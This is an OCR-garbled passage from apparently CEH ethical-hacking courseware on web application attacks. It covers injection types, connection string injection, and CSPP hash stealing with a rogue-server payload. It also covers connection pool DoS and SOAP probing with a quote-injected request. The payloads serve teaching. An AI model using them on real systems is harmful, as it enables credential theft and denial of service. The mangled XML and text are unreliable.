a u th e n tic a te h im o r h e r s e lf w ith th e ta r g e t w e b a p p lic a tio n . T h u s , s n iffin g th e v a lid se ssio n
to k e n is im p o r ta n t in s e s s io n m a n a g e m e n t a tta c k s . A tta c k e rs s n iff th e a p p lic a tio n t r a f f ic u s in g a
s n iffin g to o l su ch as W ire s h a rk o r an in te r c e p tin g p ro x y su ch as B u rp . If HTTP c o o k ie s a re b e in g
u sed as th e tra n s m is s io n m e c h a n is m f o r se ssio n to k e n s a n d th e s e c u r ity fla g is n o t s e t,
a tta c k e rs can re p la y th e c o o k ie to g a in u n a u th o riz e d access t o a p p lic a tio n . A tta c k e r s can use
se ssio n c o o k ie s t o p e r fo r m se ssio n h ija c k in g , se ssio n re p la y , a n d m a n - in - th e - m id d le a tta c k s .
W ir e s h a r k
S o u rc e : h tt p : / / w w w . w ir e s h a r k . o r g
W ir e s h a r k is a n e tw o r k p ro to c o l a n a ly z e r. It le ts y o u c a p tu re a n d in te r a c tiv e ly b ro w s e th e tr a f fic
r u n n in g o n a c o m p u te r n e tw o r k . It c a p tu re s liv e n e tw o r k t r a f f ic fr o m E th e rn e t, IEEE 8 0 2 .1 1 ,
P P P /H D LC , A T M , B lu e to o th , USB, T o k e n R in g , F ra m e R e la y , a n d FDDI n e tw o r k s . C a p tu re d file s
can be p ro g r a m m a tic a lly e d ite d via th e c o m m a n d lin e .

Web App H a ck in g M eth o d o lo g y C EH
Attack
Footprint Web Analyze Web Authorization Perform Attack
Infrastructure Applications Schemes Injection Attacks Web App Client

Mechanism Mechanism
l- H H In je c tio n a tta c k s a re v e ry c o m m o n in w e b a p p lic a tio n s . T h e re a re m a n y ty p e s o f

in je c tio n a tta c k s su ch as w e b s c rip ts in je c tio n , OS c o m m a n d s in je c tio n , SM TP in je c tio n , SQL
in je c tio n , LDAP in je c tio n , and X P ath in je c tio n . A p a r t fr o m all th e s e in je c tio n a tta c k s , a
fr e q u e n tly o c c u r rin g a tta c k is a SQL in je c tio n a tta c k . In je c tio n fr e q u e n tly ta k e s p la c e w h e n th e
d a ta t h a t is g iv e n b y th e u s e r is s e n t to th e in t e r p r e t e r as a p a r t o f a c o m m a n d o r q u e ry . For
la u n c h in g an in je c tio n a tta c k , th e a tta c k e r s u p p lie s th e c r a fte d d a ta t h a t tr ic k s a n d m a k e s th e
in t e r p r e t e r t o e x e c u te th e c o m m a n d s o r q u e ry t h a t a re u n in te n d e d . B ecause o f th e in je c tio n
fla w s , th e a tta c k e r can e a s ily re a d , c re a te , u p d a te , a n d re m o v e a n y o f th e a r b it r a r y d a ta , i.e .,
a v a ila b le to th e a p p lic a tio n . In s o m e cases, th e a tta c k e r can e v e n b yp a ss a d e e p ly n e s te d
fir e w a ll e n v ir o n m e n t a n d can ta k e c o m p le te c o n tr o l o v e r th e a p p lic a tio n a n d th e u n d e r ly in g
s y s te m . T h e d e ta il o f e ach in je c tio n a tta c k is g iv e n o n th e fo llo w in g slid e s.

‫נ‬
InjectionAttacks CEH
Urt1fw4 ilhiul lUthM
J In in je c tio n a tta c k s , a tta c k e r s s u p p ly c ra fte d m a lic io u s in p u t t h a t is s y n t a c t i c a ll y c o r r e c t a c c o r d i n g t o
th e in te r p r e te d la n g u a g e b e in g u se d in o rd e r to b re a k a p p lic a t io n 's n o rm a l in te n d e d
W e b S c r ip ts I n je c t io n S Q L I n je c t io n
If user in p u t is used in to code th a t is d yn a m ica lly
E n te r a s e r ie s o f m a lic io u s S Q L q u e r ie s
D executed, e n te r cra fte d in p u t th a t breaks th e

in te n d e d data co n te x t and executes c om m a nds on
B in to in p u t fie ld s to d ir e c t ly m a n ip u la t e
th e d a ta b a s e
th e server
B ‫ם‬
O S C o m m a n d s I n je c t io n LD A P I n je c t io n
E x p lo it o p e r a tin g s y s te m s b y e n te r in g T a k e a d v a n ta g e o f n o n - v a lid a te d w eb
m a lic io u s c o d e s in in p u t f ie ld s if a p p lic a tio n s ‫ש‬ a p p lic a tio n in p u t v u ln e r a b ilit ie s to pass LD A P
u t iliz e u s e r in p u t in a s y s t e m - le v e l c o m m a n d filte r s to o b t a in d ir e c t a c c e s s t o d a ta b a s e s
B a
S M T P I n je c t io n X P a th I n je c t io n
In je c t a r b it r a r y S T M P c o m m a n d s in t o E n te r m a lic io u s s tr in g s in in p u t fie ld s in
a p p lic a tio n a n d S M T P s e r v e r c o n v e r s a tio n t o B o rd e r to m a n ip u la t e th e X P a th q u e ry so
g e n e r a t e la r g e v o lu m e s o f s p a m e m a il t h a t it in te r fe r e s w ith th e a p p l i c a t i o n 's lo g ic
N o t e : F o r c o m p le t e c o v e r a g e o f S Q L In je c t io n c o n c e p ts an d te c h n iq u e s re fe r to M o d u le 1 4 : S Q L I n je c t io n
I
In je c tio n A tta c k s
In in je c tio n a tta c k s , a tta c k e rs s u p p ly c r a fte d m a lic io u s in p u t t h a t is s y n ta c tic a lly c o rr e c t

a c c o rd in g t o th e in te r p r e te d la n g u a g e b e in g used in o r d e r t o b re a k th e a p p lic a tio n 's n o r m a lly
in te n d e d in p u t.
Q W e b S c rip ts In je c tio n : If u s e r in p u t is u sed in c o d e t h a t is d y n a m ic a lly e x e c u te d , e n te r

c r a fte d in p u t t h a t b re a k s th e in te n d e d d a ta c o n te x t a n d e x e c u te s c o m m a n d s o n th e
s e rv e r
Q OS C o m m a n d s In je c tio n : E x p lo it o p e ra tin g s y s te m s b y e n te r in g m a lic io u s c o d e in in p u t

fie ld s if a p p lic a tio n s u tiliz e u s e r in p u t in a s y s te m -le v e l c o m m a n d
© S M T P In je c tio n : In je c t a r b itr a r y SM TP c o m m a n d s in to a p p lic a tio n a n d SM TP s e rv e r

c o n v e rs a tio n t o g e n e ra te la rg e v o lu m e s o f s p a m e m a il
0 SQL In je c tio n : E n te r a s e rie s o f m a lic io u s SQL q u e rie s in to in p u t fie ld s t o d ir e c tly

m a n ip u la te th e d a ta b a s e
© LDAP In je c tio n : T a ke a d v a n ta g e o f n o n -v a lid a te d w e b a p p lic a tio n in p u t v u ln e r a b ilitie s

t o pass LDAP filte r s t o o b ta in d ir e c t access t o d a ta b a s e s
© X P a th In je c tio n : E n te r m a lic io u s s trin g s in in p u t fie ld s in o r d e r to m a n ip u la te th e X P ath

q u e ry so t h a t it in te r fe r e s w it h th e a p p lic a tio n 's lo g ic
M o d u le 13 Page 1884 Ethical H acking a n d C o u n te rm e a s u re s C opyright © by EC-C0UnCil


Mechanism Mechanism
^ ^ “ ‫־‬J A tta c k in g th e d a ta c o n n e c tiv ity a llo w s th e a tta c k e r t o g a in u n a u th o riz e d c o n tr o l o v e r

th e in f o r m a tio n in th e d a ta b a s e . T h e v a rio u s ty p e s o f d a ta c o n n e c tiv ity a tta c k s a n d t h e ir
causes as w e ll as c o n s e q u e n c e s a re e x p la in e d in d e ta il o n th e fo llo w in g slid e s.

A t t a c k D a t a C o n n e c t iv it y CEH
‫ץ ־‬ r~
D a ta b a s e c o n n e c tio n s tr in g s a re u s e d D a ta b a s e c o n n e c tiv ity a tta c k s e x p lo it
to c o n n e c t a p p lic a tio n s to d a ta b a s e th e w a y a p p lic a tio n s c o n n e c t to th e
e n g in e s d a ta b a s e in s te a d o f a b u s in g
d a ta b a s e q u e r ie s
"D a ta S o u rc e = S e rv e r,P o rt;
0 r r
N etw o rk Library=DBMSSOCN; D a ta C o n n e c tiv ity A tta c k s
I n i t i a l C a ta lo g = D a ta B a se ; 0r r S C o n n e c tio n S t r in g I n je c t io n
U ser ID=Username;
Password=pwd;" 0r r S C o n n e c tio n S t r in g P a ra m e te r
0r r
P o llu t io n (C S P P ) A tta c k s
E x a m p le o f a c o m m o n c o n n e c tio n S C o n n e c tio n P o o l D oS
<s=©
s tr in g u s e d to c o n n e c t to a M ic r o s o f t
S Q L S e rv e r d a ta b a s e
0 T r
o
J ‫־‬L
_ y v_
A tta c k D a ta C o n n e c tiv ity

^ A
A tta c k e rs d ir e c tly a tta c k d a ta c o n n e c tiv ity so th a t th e y can access s e n s itiv e
in fo r m a tio n a v a ila b le in th e d a ta b a s e . D a ta b a s e c o n n e c tiv ity a tta c k s e x p lo it th e w ay
a p p lic a tio n s c o n n e c t t o th e d a ta b a s e in s te a d o f a b u s in g d a ta b a s e q u e rie s .
Data Connectivity Attacks

© C o n n e c tio n S trin g In je c tio n
© C o n n e c tio n S trin g P a ra m e te r P o llu tio n (CSPP) A tta c k s
© C o n n e c tio n Pool DoS
D a ta b a s e c o n n e c tio n s trin g s a re used to c o n n e c t a p p lic a tio n s to d a ta b a s e e n g in e s :
" D a ta S o u r c e = S e r v e r , P o r t ; N e tw o r k L ib ra ry = D B M S S O C N ; In itia l C a t a lo g = D a ta B a s e ;
U ser ID = U s e rn a m e ; P a s s w o r d = p w d ;"
E xa m p le o f a c o m m o n c o n n e c tio n s tr in g u sed to c o n n e c t to a M ic r o s o ft SQL S e rv e r d a ta b a s e

C o n n e c tio n S tr in g In j e c t i o n CEH
In a d e le g a te d a u th e n tic a tio n e n v ir o n m e n t, th e a t ta c k e r in je c ts p a ra m e te rs in a
c o n n e c tio n s tr in g b y a p p e n d in g th e m w ith th e s e m ic o lo n ( ;) c h a r a c t e r
A c o n n e c tio n s tr in g in je c tio n a tta c k c a n o c c u r w h e n a d y n a m ic s tr in g c o n c a t e n a tio n
is u s e d to b u ild c o n n e c tio n s tr in g s b a s e d o n u s e r in p u t
B e fo re I n je c t io n
"Data Source=Server,Port; Network Library=DBMSSOCN; I n i t i a l Catalog=DataBase;

User ID=Username; Password=pwd;"
A f t e r I n je c t io n
"Data Source=Server,Port; Network Library=DBMSSOCN; I n i t i a l Catalog=DataBase;

User ID=Username; Password=pwd; E ncryption=off"
W h e n t h e c o n n e c tio n s tr in g is p o p u la te d , t h e Encryption v a lu e w i ll b e a d d e d t o t h e p r e v io u s ly c o n f ig u r e d s e t
o f p a ra m e te rs
C o n n e c tio n S tr in g In je c tio n
■
^ A c o n n e c tio n s trin g in je c tio n a tta c k can o c c u r w h e n d y n a m ic s trin g c o n c a te n a tio n is
u sed to b u ild c o n n e c tio n s trin g s t h a t a re b ase d o n u s e r in p u t. If th e s trin g is n o t v a lid a te d a nd
m a lic io u s t e x t o r c h a ra c te rs n o t e s c a p e d , an a tta c k e r can p o t e n t ia lly access s e n s itiv e d a ta o r
o th e r re s o u rc e s o n th e s e rv e r. F or e x a m p le , an a tta c k e r c o u ld m o u n t an a tta c k b y s u p p ly in g a
s e m ic o lo n a n d a p p e n d in g an a d d itio n a l v a lu e . T h e c o n n e c tio n s trin g is p a rs e d b y u s in g a "la s t
o n e w in s " a lg o r ith m , a nd th e h o s tile in p u t is s u b s titu te d f o r a le g itim a te v a lu e .
T h e c o n n e c tio n s trin g b u ild e r classes a re d e s ig n e d t o e lim in a te g u e s s w o rk a n d p r o te c t a g a in s t

s y n ta x e rro rs a n d s e c u r ity v u ln e r a b ilitie s . T h e y p ro v id e m e th o d s a n d p ro p e rtie s c o rre s p o n d in g
t o th e k n o w n k e y /v a lu e p a irs p e r m itte d b y e a ch d a ta p ro v id e r. Each class m a in ta in s a fix e d
c o lle c tio n o f s y n o n y m s a n d can tr a n s la te fr o m a s y n o n y m t o th e c o rr e s p o n d in g w e ll- k n o w n ke y
n a m e . C hecks a re p e r fo r m e d f o r v a lid k e y /v a lu e p a irs a nd an in v a lid p a ir th r o w s an e x c e p tio n .
In a d d itio n , in je c te d v a lu e s a re h a n d le d in a sa fe m a n n e r.
B e fo re in je c tio n
T h e C o m m o n c o n n e c tio n s trin g g e ts c o n n e c te d t o th e M ic r o s o ft SQL S e rv e r d a ta b a s e as s h o w n

as fo llo w s :

Connection String Param eter r CII

Pollution (CSPP) Attacks <.!!1E !1
A tta c k e r trie s t o conn ect to th e

database by using th e W eb
A p p lic a tio n S ystem account
instead o f a u s er-pro vided set o f
credentials
D a ta s o u rc e - SQ L2005; D a ta s o u rc e ‫״‬ SQ L2005; in itia l D a ta s o u rc e ‫ ־־‬S Q L 2 0 0 5 ; in itia l

in itia l c a ta lo g ‫״‬ d b l; c a ta lo g ‫״‬ d b l ; in te g r a te d c a ta lo g ‫״‬ d b l/ in te g r a te d
in t e g r a t e d s e c u r ity ‫ ״‬n o ; user s e c u r ity ‫ ״‬n o ; u s e r i d ‫; ״‬D a ta s e c r u r ity ‫ ״‬n o ; u s e r i d ‫; ״‬D a ta
i d ‫ ; ״‬D a ta S o u rc e ‫ ״‬Rogue S o u rc e ‫ ״‬T a r g e t S e r v e r , T a rg e t S o u r c e —T a r g e t S e r v e r , T a r g e t
S e rv e r; P a s s w o rd ‫; ״‬ P o r t ■4 4 3 ; P as s w o rd ‫; ״‬ P o r t ; P a s s w o rd ■ ; I n t e g r a t e d
In te g ra te d S e c u r ity ‫ ״‬t r u e ; In te g ra te d S e c u r ity ‫ ״‬t r u e ; S e c u r ity ‫ ״‬t r u e ;
A tta c k e r w ill th e n s n iff W in d o w s

c re d e n tia ls (passw ord hashes) w hen
th e a p p lic a tio n trie s to conn ect to
Rogue_Server w ith th e W in d o w s
credentia ls it's ru n n in g on
C o n n e c tio n S tr in g P a r a m e te r P o llu tio n (C S P P )
A tta c k s
C o n n e c tio n s trin g p a r a m e te r p o llu tio n (CSPP) is used b y a tta c k e rs to s te a l u s e r IDs a n d to h ija c k

w e b c re d e n tia ls . CSPP e x p lo its s p e c ific a lly th e s e m ic o lo n d e lim ite d d a ta b a s e c o n n e c tio n s trin g s
t h a t a re c o n s tr u c te d d y n a m ic a lly b ase d o n th e u s e r in p u ts fr o m w e b a p p lic a tio n s . In CSPP
a tta c k s , a tta c k e rs o v e r w r ite p a r a m e te r v a lu e s in th e c o n n e c tio n s trin g .
H a s h S t e a lin g
. A n a tta c k e r re p la c e s th e v a lu e o f d a ta s o u rc e p a r a m e te r w ith th a t o f a R ogue

M ic r o s o ft SQL S e rv e r c o n n e c te d to th e In te r n e t r u n n in g a s n iffe r :
D a ta s o u r c e = S Q L 2 0 0 5 ; i n i t i a l c a t a l o g d b l; in t e g r a t e d s e c u r it y = n o ; user
I D = ; D a t a S o u rc e = R o g u e S e r v e r ; P a ssw ord= In te g r a te d S e c u r ity = tr u e ;
A tta c k e rs w ill th e n s n iff W in d o w s c r e d e n tia ls (p a s s w o rd h a sh e s) w h e n th e a p p lic a tio n tr ie s to

c o n n e c t t o R o g u e _ S e rv e r w ith th e W in d o w s c re d e n tia ls it's r u n n in g o n .
P o r t S c a n n in g
‫ב‬ A tta c k e r tr ie s to c o n n e c t t o d if fe r e n t p o r ts b y c h a n g in g th e v a lu e a n d s e e in g th e e r r o r
m e ssa ge s o b ta in e d .

ConnectionPool DoS CEH

C«rt1fW4 ItliK4I Km Im (
A t t a c k e r e x a m in e s t h e c o n n e c tio n p o o lin g s e t tin g s o f th e a p p lic a tio n ,
c o n s tru c ts a la r g e m a lic io u s S Q L q u e r y , a n d ru n s m u ltip le q u e r ie s
s im u lta n e o u s ly t o c o n s u m e a ll c o n n e c t io n s in th e c o n n e c tio n p o o l, c a u s in g
d a ta b a s e q u e r ie s to fa il f o r le g it im a t e u s e rs
Example:
B y d e f a u lt in A S P .N E T , t h e m a x im u m a llo w e d c o n n e c tio n s in th e p o o l is &
1 0 0 a n d t i m e o u t is 3 0 s e c o n d s
T h u s , a n a tta c k e r c a n ru n 1 0 0 m u ltip le q u e r ie s w ith 3 0 + s e c o n d s
e x e c u t io n tim e w ith in 3 0 s e c o n d s to c a u s e a c o n n e c tio n p o o l D o S s u c h
th a t n o o n e e ls e w o u ld b e a b le to u s e th e d a ta b a s e - r e la te d p a rts o f th e
a p p lic a tio n
C o n n e c tio n P o o l D o S
* T h e a tta c k e r e x a m in e s th e c o n n e c tio n p o o lin g s e ttin g s o f th e a p p lic a tio n , c o n s tru c ts a

la rg e m a lic io u s SQL q u e ry , a n d ru n s m u ltip le q u e rie s s im u lta n e o u s ly to c o n s u m e all c o n n e c tio n s
in th e c o n n e c tio n p o o l, c a u s in g d a ta b a s e q u e rie s to fa il f o r le g itim a te u s e rs .
E x a m p le :
By d e fa u lt, in ASP.NET, th e m a x im u m a llo w e d c o n n e c tio n s in th e p o o l is 1 0 0 a n d t im e o u t is 3 0

se c o n d s .
T h u s, an a tta c k e r can ru n 1 0 0 m u ltip le q u e rie s w it h 3 0+ s e c o n d s e x e c u tio n tim e w ith in 30

s e c o n d s t o cause a c o n n e c tio n p o o l DoS su ch t h a t n o o n e else w o u ld be a b le t o use th e
d a ta b a s e re la te d p a rts o f th e a p p lic a tio n .

Web App H ackin g M eth o d o lo g y C EH

(•rtifWd itfciul lUilwt
Attack
Footprint Web Analyze Web Authorization Perform Attack
Infrastructure Applications Schemes Injection Attacks Web App Client
A t ta c k W e b A p p C lie n t
A tta c k s p e r fo r m e d o n a s e rv e r-s id e a p p lic a tio n in fe c t th e c lie n t-s id e a p p lic a tio n w h e n th e

c lie n t-s id e a p p lic a tio n in te r a c ts w ith th e s e m a lic io u s s e rv e r o r p ro c e s s m a lic io u s d a ta . T h e
a tta c k o n th e c lie n t sid e o c c u rs w h e n th e c lie n t e s ta b lis h e s a c o n n e c tio n w it h th e s e rv e r. If
th e r e is n o c o n n e c tio n b e tw e e n c lie n t a n d s e rv e r, th e n th e r e is n o risk. T h is is b e c a u s e n o
m a lic io u s d a ta is passed b y th e s e rv e r to th e c lie n t. C o n s id e r an e x a m p le o f a c lie n t-s id e a tta c k
w h e re an in fe c te d w e b p age ta rg e ts a s p e c ific b r o w s e r w e a k n e s s a n d e x p lo its it s u c c e s s fu lly . As
a re s u lt, th e m a lic io u s s e rv e r g a in s u n a u th o riz e d c o n tr o l o v e r th e c lie n t s y s te m .

AttackWebAppClient
J A tta c k e rs in te r a c t w ith th e s e r v e r - s id e a p p lic a tio n s in u n e x p e c te d w a y s in o r d e r to p e r fo r m m a lic io u s
a c t io n s a g a in s t t h e e n d u s e rs a n d a c c e s s u n a u th o r iz e d d a ta
Redirection Frame Session ActiveX

Attacks Injection Fixation Attacks
Cross-Site HTTP Header Request Privacy

Scripting Injection Forgery Attack Attacks
C o p y r ig h t © b y EC-Council. A l l R ig h ts R e s e r v e d R e p r o d u c t i o n i s S t r i c t l y P r o h ib it e d .
A tta c k W e b A p p C lie n t
A tta c k e rs in te r a c t w ith th e s e rv e r-s id e a p p lic a tio n s in u n e x p e c te d w a y s in o r d e r to

p e r fo r m m a lic io u s a c tio n s a g a in s t th e e n d u sers a n d access u n a u th o r iz e d d a ta . A tta c k e rs use
v a rio u s m e th o d s to p e r fo r m th e m a lic io u s a tta c k s .
T h e fo llo w in g a re th e m a lic io u s a tta c k s p e r fo r m e d b y a tta c k e rs to c o m p ro m is e c lie n t-s id e w e b

a p p lic a tio n s :
© C ro ss-S ite S c rip tin g
© R e d ire c tio n A tta c k s
© HTTP H e a d e r In je c tio n
© F ra m e In je c tio n
© R e q u e s t F o rg e ry A tta c k s
© S ession F ix a tio n
© P riv a c y A tta c k s
© A c tiv e X A tta c k s


Mechanism Mechanism
A tta c k W e b S e r v ic e s
W e b s e rv ic e s a re e a s ily ta rg e te d b y th e a tta c k e r. S e rio u s s e c u r ity b re a c h e s a re ca u s e d w h e n an

a tta c k e r c o m p ro m is e s th e w e b s e rv ic e s . T h e d if fe r e n t ty p e s o f w e b s e rv ic e a tta c k s a n d t h e ir
c o n s e q u e n c e s a re e x p la in e d o n th e fo llo w in g s lid e s .

AttackWebServices CEH
J W e b s e r v ic e s w o r k a to p th e le g a c y w e b a p p lic a tio n s , a n d a n y a tta c k o n w e b s e r v ic e w ill im m e d ia t e ly
e x p o s e a n u n d e r ly in g a p p lic a t io n 's b u s in e s s a n d lo g ic v u ln e r a b ilit ie s f o r v a r io u s a tta c k s
In fo rm a tio n Leakage, D a ta b a s e A tta c k s ,

A p p lic a tio n Logic Attacks
D o S A tta c k s
Cl
r jf A tta c k W e b S e r v ic e s
W e b s e rv ic e s w o r k a to p th e le g a c y w e b a p p lic a tio n s , a n d a n y a tta c k o n a w e b s e rv ic e

w ill im m e d ia te ly e x p o s e an u n d e r ly in g a p p lic a tio n 's b u s in e s s a n d lo g ic v u ln e r a b ilit ie s f o r
v a rio u s a tta c k s . W e b s e rv ic e s can be a tta c k e d u s in g m a n y te c h n iq u e s as th e y a re m a d e
a v a ila b le to u se rs th r o u g h v a rio u s m e c h a n is m s . H e n c e , th e p o s s ib ility o f v u ln e r a b ilitie s
in cre a s e s . T h e a tta c k e r can e x p lo it th o s e v u ln e r a b ilit ie s t o c o m p ro m is e th e w e b s e rv ic e s . T h e re
m a y b e m a n y re a s o n s b e h in d a tta c k in g w e b s e rv ic e s . A c c o rd in g to th e p u rp o s e , th e a tta c k e r
can c h o o s e th e a tta c k to c o m p ro m is e w e b s e rv ic e s . If th e a tta c k e r 's in te n tio n is to s to p a w e b
s e rv ic e fr o m s e rv in g in te n d e d u sers, th e n th e a tta c k e r can la u n c h a d e n ia l-o f-s e rv ic e a tta c k by
s e n d in g n u m e r o u s re q u e s ts .
V a rio u s ty p e s o f a tta c k s u sed t o a tta c k w e b s e rv ic e s a re :
© SOAP In je c tio n
© X M L In je c tio n
© W S D L P ro b in g A tta c k s
© In fo r m a tio n Leakage
© A p p lic a tio n Logic A tta c k s
© D a ta b a s e A tta c k s

W eb S e rv ic e s P ro b in g A tta c k s CEH
Urtifwd ilhiul lUtbM
6 In th e fir s t step, th e a ttacke r tra p s th e WSDL

d o c u m e n t fro m w e b service tra ffic and analyzes it to
d e te rm in e th e p urp o se o f th e a p p lic a tio n , fu n c tio n a l
break d o w n , e n try po in ts , and message types
‫ר‬ 6 A tta cker th e n creates a s e t o f v alid re q u e s ts by selecting
a set o f o p e ra tio n s , and fo rm u la tin g th e request
messages a ccording to th e rules o f th e XM L Schema th a t
can be s u b m itte d t o th e w e b service
9 These attacks w o rk s im ila r t o SQL in je c tio n attacks « A tta c k e r uses th e se requests t o in clude m alicious
c o n te n ts in SOAP requests and analyzes errors t o gain a
deeper und erstanding o f p o te n tia l s ecurity weaknesses
<?>o:ml versions" 1,0" encoding‫" ־‬utf-8" ?>

- <soap: Envelope xmlns: soap‫"־‬http://schemas.xmlsoap.org/soap/ envelope/‫־‬
<?xml verslon‫"־‬I.O- encoding‫" ־‬UTF‫־‬S' standalone‫' ־‬
xmlns: xsi=" http ://w w w .w3 .org/2001/XMLSchem ‫־־‬-instl'lnce "
no* ?>
xmlns: xsd='http ://w w w .w3 .org/20DI/XMLSchemlT>
- <$QAP-ENV: Envelope )(mlns:
■ <soap: Body>
SOAPSOKl‫"־‬h ttp://w w w .w 3.org/2001/
• <soap:Fault>
v . - r : ur■•■. XMLschcma' <faultcode>soap:Server</faultcode>
xmlns: S0APSDK2‫"־‬http ://w w w .w3 .org/200
<faultstring>System. Web .Services .Protocols .SoapException: t r w m i w t i • to
A t ta c k e r l/XMLSchem.o- Inst.once" procat• request -> ryrtem Oata.OUDb.OMDb*nceptlon Syntax •rror (milling operator) •n quwv t.p r n •‫'׳־‬
xmlns: S0APSDK3«"http://schemas .xmlso.op productname Ilk• '‫ ־‬and provlderld • '112 • 111 - •941*. At
.org/soap/ encoding/' xmlns: SOAPENV‫־‬
' http://schemas .xmlsoap .org/soap/ envelope/'>
tyttem Data.Ole Db.OleDbc omm and liecutc( omm and Teatluar Hand■ ng
IMU hr) •t lystemData.OleDb.OleDbccmma ndlnearteComma ndtert>orS lngle«o« J t 1
• <SOAP- ENV Body •
liagOBTAftAMS dbfaramt. Obiectg, e«ea/teHeu>t) •t
1
system Data.OleOb.OleOOCommand (•ecule(ommandTrat|Ot>;cct&eaocut<*<et / t ) at System Data (*<06
CMObCemmand UeaiteCommand !Command Behavior beftavlor. Object* axactfafteiuN) at S*«wn Oata
- <SOAPSDK 4: GetProdUctlnformationByName
OUOb CteObCo mm and. liKuKKe adcri ntcrna !(Command Behavior behavior. String methoe) at
xmlns: SQAPSDK4■' http://s*austlap/Productlnfo/‘> S e rver th ro w s Syftam.Oata.OMDb.OMObccn1mand.ixaa«teKeader|Con1mandBehBv1ar behavior) at
iystem Data.OleDkOleObcommand laea/teKcader() at Pvoduet Mo. ProductOBAaess bet Produd
A tta c k e r in ject [<SQAPSDK4; name?■ ^SQAP3DK4; n a m d
an e rro r IrVarmatlonlStrlng productMame, String uld, String password) at
<S0APSDK4: uid>312 ■111 -8S43</SOAPSDK4:uid>
ProdjetlnfaPtoduclnfoXiatProdualnl or mat ion&*Name( Siring name, String jd . Stnrg password) Ind 0‫׳‬
a rb itra ry character <S0APSDK4: password> 5648</SOAPSDK4:
inner axctpoon stack trac —</faultstring>
password>
(') in th e in p u t field <detail />
</SOAPSDK 4: GetProduc t In forma ti 0 n B y Name>
</soap: Fault>
</SOAP‫־‬ENV: Body •
< /soap : Body>
</SOAPENV: Envelope> < /soap: E nvelo pe>
C o p y r ig h t © b y EG-Gouacil.A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b S e r v ic e s P r o b in g A tta c k s
In th e f ir s t s te p , th e a tta c k e r tr a p s th e W S D L d o c u m e n t fr o m w e b s e rv ic e tr a f fic a nd
a n a lyze s it to d e te r m in e th e p u rp o s e o f th e a p p lic a tio n , fu n c tio n a l b re a k d o w n , e n tr y p o in ts ,
a n d m e ssa g e ty p e s . T h e se a tta c k s w o r k s im ila r ly to SQL in je c tio n a tta c k s . T h e a tta c k e r th e n
c re a te s a s e t o f v a lid re q u e s ts b y s e le c tin g a s e t o f o p e ra tio n s , a n d fo r m u la tin g th e re q u e s t
m e ssa ge s a c c o rd in g to th e ru le s o f th e X M L S ch em a t h a t can be s u b m itte d t o th e w e b s e rv ic e .
T h e a tta c k e r uses th e s e re q u e s ts t o in c lu d e m a lic io u s c o n te n t in SO AP re q u e s ts a n d a n a ly z e s
e rro rs to g a in a d e e p e r u n d e r s ta n d in g o f p o te n tia l s e c u r ity w e a k n e s s e s .
<?>o:ml version‫ " ־‬I, O" encoding‫" ־‬utf-8" 1>

■<soap: Envelope xmlns: soap='http://schemas.xmlsoap.org/&oap/ envelope/"
<?xml version1.0" ‫ • ־‬encoding‫' ־‬U TF-S' standalone‫־‬
xmlns: xsi="h ttp ://w w w .w 3 .org/2001/XMLSchem~- instl'lnce "
no' ?>
xmlns: x s d='hup://w w w .w3 .org/200 l/XMLSchemlT>
• <SOAP*ENV: Envelope )(mlns:
• <soap: Body>
SOAPSDKl="h ttp://w w w .w 3.org/2001/
• <soap:Fault>
XMLschema'
<fauKcode>soa p:Se rver</faultcode>
xmlns: SOAPSDK2="http ://w w w .w 3 .org/200
<fauhstring>System. W eb .Services .Protocols .SoapException: ‫׳‬vÂ ûnahi.'-o
Attacker l/XMLSchem.o- inst.once" process request —• 1y5t em.Dale.OleOb.CXeObCxception: Syntax error Imissinc operator I in query u p m m
xmlns: SOAPSDK3="http://schemas .xmlso.op productnamelike “and provide rid -'312 - 111 8543". At
.org/soap/ encoding/' xmlns: SOAPENV‫־‬ sy(tenvData.O4eDb.Qle0bconvnand.Executc(ommandTextErR>rHandling
11nt32 hr)at »ystern •Data.CMeOto.OleOtxomrrand.ExecuteCommindTeMtFoi SintfeReuill
‘ http://schemas .xmlsoap .org/soap/ envelope/'* ItagDSPARAMSdbParam?, Objects execi*eKesuft) at
- <SOAP- ENV:Body> sy*t rm_D«fa.OIe Db.QUCbcomniand f xecutrCorrmand Tart( Objrtt&m rcut pftnult) at Sy»tem .Dat a HleOfe
- <SOAPSOK4: GetProdUctlnformationByName OteCXjCommiod .ExecuteCommind (Command Behavior behdvioi. Objects exauttfteMlt)4t System Data
‫•־‬............•< xmlns: SOAPSDK4=' 1‫ ^ ו‬: / ^ 81‫ו‬51^ ^ 0 ^ 1^ 1^ 0 / ‫> י‬ S e rv e r th ro w s
.0*roh .OlcDbCo mm and. txecuteneoderi ntc ma I (command Behavior bchavior, String m<‫־‬t hod) at
System.Oats.(JleOb.deDtxonwTwindt xn 11H rs d n (( aniniflndRdiavior behavior) at
A ttacker in ject kS0APSDK4: name> </S0APSDK4:namel S'nt«mi>atd.Ol«ObXlleOtx«11*11<1r1dExk;1uteRc^dud at Pi oduct Info. ProdwUOSAuiL-u •Qet Piodwct
<SOAPSOK4: uld>312 - 111 - 8543</SOAPSDK4: uid> an e rro r informatioo|striflg p rodu<tNamcv st ri nj uld, St ring password) at
a rb itra ry character P'0d1Ktlnfc.PTuduclnl<xCetP10duc(ln(urn«tianBYN«1n^StrinRname,$t(1n« u»d,String paMMreid) —Cndol
<S0APSDK4: password* 5648</SOAP$DK4:
inner Mcepttonstadctrar- —< /faultSthng>
(') in the in p u t field pa39word>
<detail />
</SOAPSDK 4: GetProduc t In forma tiO n B y Name>
</soap: Fault>
</SOAP‫־‬ENV: Body>
</soap : Body>
</SOAP‫־‬ENV: Envelope*
</30jp: Envelope-'
F IG U R E 1 3 .5 3 : W e b S e r v ic e s P r o b in g A tta c k s
M o d u le 13 P ag e 1899 Ethical H acking a n d C o u n te rm e a s u re s C opyright © by EC-C0l1nCil

Web Service Attacks: SOAP

In je c tio n
J A t ta c k e r in je c ts m a lic io u s q u e ry s tr in g s in t h e u s e r in p u t fie ld to b y p a s s w e b s e r v ic e s
a u th e n tic a tio n m e c h a n is m s a n d a cce ss b a c k e n d d a ta b a s e s
J T h is a tta c k w o rk s s im ila r ly t o S Q L I n je c t io n a tta c k s
0 d )®
Server Response
O O h ttp : //ju g g y b o y . c o m /w s /p r o d u c ts .a s m x
< ? xm l v e r s io n “ " 1 .0 ‫״‬ e n c o d in g = " u tf- 8 ' ?>

Account Login - < so^>: E n v e lo p e x m ln s : s o a p = ' ,h ttp ://s c h e m a s
.x m ls o a p . o r g / s o a p /e n v e lo p e /"
